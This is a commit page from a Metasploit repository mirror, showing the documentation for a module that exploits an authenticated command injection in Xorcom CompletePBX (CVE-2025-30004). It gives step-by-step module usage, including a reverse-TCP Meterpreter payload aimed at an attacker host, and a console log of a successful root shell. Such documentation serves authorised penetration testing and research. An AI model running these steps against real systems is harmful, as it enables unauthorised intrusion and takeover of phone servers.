adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add auxiliary and exploit modules for Xorcom CompletePBX 5.2.35 CVEs (2025-2292, 30004, 30005, 30006)

Browse Source
This commit is contained in:
Chocapikk
2025-06-22 09:07:20 +02:00
parent b39d45c205
commit 2a008c83d1
6 changed files with 858 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/xorcom_completepbx_scheduler.md
+99
View File
@@ -0,0 +1,99 @@
## Vulnerable Application
This Metasploit module exploits an **Authenticated Command Injection** vulnerability in **Xorcom CompletePBX <= 5.2.35**.
The issue resides in the task scheduler functionality, where user-controlled input is improperly sanitized, allowing
arbitrary command execution with web server privileges.
Only the **superadmin** user (`admin`) has the necessary permissions to trigger this exploit.
Even when creating a new user with maximum privileges, the vulnerability does not work.
The vulnerability is identified as **CVE-2025-30004**.
### Setup
Download the ova file here: [](https://archive.org/details/completepbx-5-2-27-vuln)
## Verification Steps
1. Deploy a vulnerable instance of **Xorcom CompletePBX <= 5.2.35**.
2. Launch **Metasploit Framework**.
3. Use the module:
```
use exploit/linux/http/xorcom_completepbx_scheduler_rce
```
4. Set the **target host**:
```
set RHOSTS [TARGET_IP]
```
5. Set authentication credentials:
```
set USERNAME [VALID_ADMIN_USERNAME]
set PASSWORD [VALID_ADMIN_PASSWORD]
```
6. Configure the payload:
```
set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
set LHOST [ATTACKER_IP]
set LPORT [LISTENER_PORT]
```
7. Execute the module:
```
run
```
8. If successful, a **Meterpreter session** will be opened on the target.
## Options
- `USERNAME`: Admin username for authentication.
- `PASSWORD`: Admin password for authentication.
## Scenarios
### Successful Exploitation Against a Vulnerable CompletePBX Instance
**Setup**:
- **Target**: Xorcom CompletePBX <= 5.2.35
- **Attacker**: Metasploit Framework instance
**Steps**:
```bash
msf6 exploit(linux/http/xorcom_completepbx_scheduler) > run http://192.168.56.101/
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if the target is running CompletePBX...
[+] Detected CompletePBX on 192.168.56.101:80
[+] The target appears to be vulnerable.
[*] Attempting authentication with username: admin
[+] Authentication successful! Session ID: sid=3b6c002860ddb5ca104e25eaa439b35052c443df
[*] Creating malicious scheduled task with description: Ut quis eum sed.
[+] Malicious task successfully created.
[*] Retrieving latest task ID for description: Ut quis eum sed....
[+] Found task with ID: 38
[*] Executing malicious task ID 38...
[*] Sending stage (3045380 bytes) to 192.168.56.101
[+] Task executed successfully!
[*] Sending delete request (mode=delete) for task ID 38...
[*] Sending delete request (mode=deleteConfirmed) for task ID 38...
[+] Task 38 deleted successfully!
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:33372) at 2025-03-18 17:18:23 +0100
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Debian 12.5 (Linux 6.1.0-20-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### Impact
- This vulnerability grants **remote code execution** capabilities.
- Attackers can execute arbitrary commands as the **web server user**, potentially leading to full system compromise.
- Exploitation provides a **Meterpreter session** for post-exploitation activities.
This module is designed to **demonstrate and automate** the exploitation of this issue using the Metasploit framework.